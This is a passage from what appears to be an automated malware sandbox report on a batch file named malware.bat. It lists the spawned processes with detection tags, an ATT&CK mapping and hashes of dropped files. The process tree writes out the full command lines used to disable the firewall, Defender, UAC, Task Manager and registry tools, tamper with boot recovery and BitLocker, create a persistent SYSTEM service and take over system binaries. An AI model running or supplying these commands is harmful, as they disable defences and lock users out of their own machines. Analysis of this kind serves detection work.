- Modifies boot configuration data using bcdedit
PID:5532

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:5548

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:5564

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:5580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:5604

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2532

C:\Windows\system32\icacls.exe
icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2192

C:\Windows\system32\shutdown.exe
shutdown /r /t 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=3984,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4688 /prefetch:1
1⤵
PID:4676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=3992,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:1
1⤵
PID:4060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=4972,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:1
1⤵
PID:4852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5400,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5408 /prefetch:8
1⤵
PID:3236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5428,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:8
1⤵
PID:984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5964,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:1
1⤵
PID:540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5936 /prefetch:8
1⤵
PID:4540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5808,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6208 /prefetch:8
1⤵
PID:516

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3fc 0x518
1⤵
PID:4276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6440,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:1
1⤵
PID:5928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=6444,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:1
1⤵
PID:6112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --field-trial-handle=6844,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:1
1⤵
PID:6124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --field-trial-handle=6608,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:1
1⤵
PID:5252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat
1⤵
- Modifies data under HKEY_USERS
PID:5612

C:\Windows\system32\net.exe
net session
2⤵
PID:5628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:5684

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5764

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5808

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5856

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5868

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5952

C:\Windows\system32\reg.exe
REG IMPORT "C:\Windows\TEMP\disable_winload.reg"
2⤵
PID:1800

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:3164

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
- Modifies data under HKEY_USERS
PID:1104

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
- Modifies data under HKEY_USERS
PID:6080

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
- Modifies data under HKEY_USERS
PID:5204

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
- Modifies data under HKEY_USERS
PID:5392

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
- Modifies data under HKEY_USERS
PID:5484

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
- Modifies data under HKEY_USERS
PID:5552

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:5680

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5628

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5764

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
- Modifies data under HKEY_USERS
PID:5848

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
- Modifies data under HKEY_USERS
PID:5864

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:4080

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:1144

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:2804

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:6064

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:6100

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5164

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5392

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:5440

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:5552

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:5680

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:5776

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
- Modifies data under HKEY_USERS
PID:5984

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:5364

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:5844

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:5896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:5964

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "GYLQWJCN$"
2⤵
PID:452

C:\Windows\system32\net.exe
net user "GYLQWJCN$"
3⤵
PID:2816

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5212

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:5188

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:5536

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:5560

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:5648

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:5796

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:6004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:5288

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5812

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5848

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5704

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5892

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5124

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:384

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38fb055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2804

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

System Services

1

T1569

Service Execution

1

T1569.002

Command and Scripting Interpreter

1

T1059

Persistence

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Impair Defenses

2

T1562

Disable or Modify Tools

1

T1562.001

Disable or Modify System Firewall

1

T1562.004

Modify Registry

1

T1112

File and Directory Permissions Modification

1

T1222

Credential Access

Discovery

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

1

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\disable_winload.reg
Filesize
91B

MD5
47b5ae368c4aff20eafa90ffdcd03a34

SHA1
dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81

SHA256
aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07

SHA512
c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
Filesize
1024KB

MD5
94194e2fa69ff276dc002efb0f8abcb6

SHA1
701f2598e03e52079e6cdc7447b0599074cd0b16

SHA256
b7c138f85c20298bdffca80a05ce874ee1456093b003a88c839031f2f21549cc

SHA512
ee89547299c1c9b0bc9288872cde385ebe60195444644551290a660bc7471802b7ace97565bfcde6d525e84aed05727855ef49b97c27d38403490a4ca4f677a5

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
7KB

MD5
83d0f9f348182309763ee1ccf371bfc6

SHA1
1bdeab33c57933dcdc7aeebde33daf840278a43f

SHA256
4ec103ac2a883e56fa40b536de331ddf1431a3937e7aa54b2b1cbc3c912e16f6

SHA512
7a06900f29fbde70dde1105a538ec60d5aca4cccaa70e55880365615daf8a4eb5d7e51abe6a96a45103bd8f86aafe9044eada9732095b04d6e873d83fabd597d

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads